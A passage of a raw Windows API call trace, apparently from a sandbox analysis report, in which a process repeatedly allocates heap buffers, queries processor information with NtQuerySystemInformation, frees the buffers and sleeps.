SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0251.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0251.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0251.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0251.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0251.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.031] Sleep (dwMilliseconds=0x110) [0251.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0251.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0251.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0251.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0251.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0251.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0251.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0251.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0251.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.052] Sleep (dwMilliseconds=0x110) [0251.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0251.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0251.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0251.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0251.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0251.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0251.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0251.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0251.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.069] Sleep (dwMilliseconds=0x110) [0251.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0251.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0251.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0251.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0251.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0251.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0251.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0251.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0251.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.081] Sleep (dwMilliseconds=0x110) [0251.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0251.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0251.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0251.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0251.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0251.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0251.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0251.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0251.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.110] Sleep (dwMilliseconds=0x110) [0251.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0251.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0251.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0251.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0251.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0251.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0251.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0251.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0251.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.129] Sleep (dwMilliseconds=0x110) [0251.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0251.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0251.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0251.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0251.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0251.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0251.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0251.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0251.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.144] Sleep (dwMilliseconds=0x110) [0251.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0251.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0251.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0251.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0251.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0251.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0251.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0251.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0251.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.156] Sleep (dwMilliseconds=0x110) [0251.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0251.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0251.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0251.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0251.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0251.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0251.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0251.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0251.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.178] Sleep (dwMilliseconds=0x110) [0251.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0251.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0251.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0251.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0251.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0251.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0251.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0251.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0251.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.191] Sleep (dwMilliseconds=0x110) [0251.210] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0251.210] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.211] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0251.213] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0251.213] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.214] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0251.214] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0251.214] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.214] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0251.214] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0251.214] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.215] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0251.215] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.215] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.221] Sleep (dwMilliseconds=0x110) [0251.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0251.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0251.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0251.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.255] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0251.260] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0251.260] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.260] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0251.260] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0251.260] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.261] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0251.261] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.261] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.261] Sleep (dwMilliseconds=0x110) [0251.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0251.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0251.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0251.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0251.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0251.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0251.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0251.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0251.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.285] Sleep (dwMilliseconds=0x110) [0251.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0251.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0251.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0251.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0251.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0251.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0251.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0251.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0251.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.346] Sleep (dwMilliseconds=0x110) [0251.512] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0251.512] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0251.518] RtlAllocateHeap (HeapHandle=0x2560000, 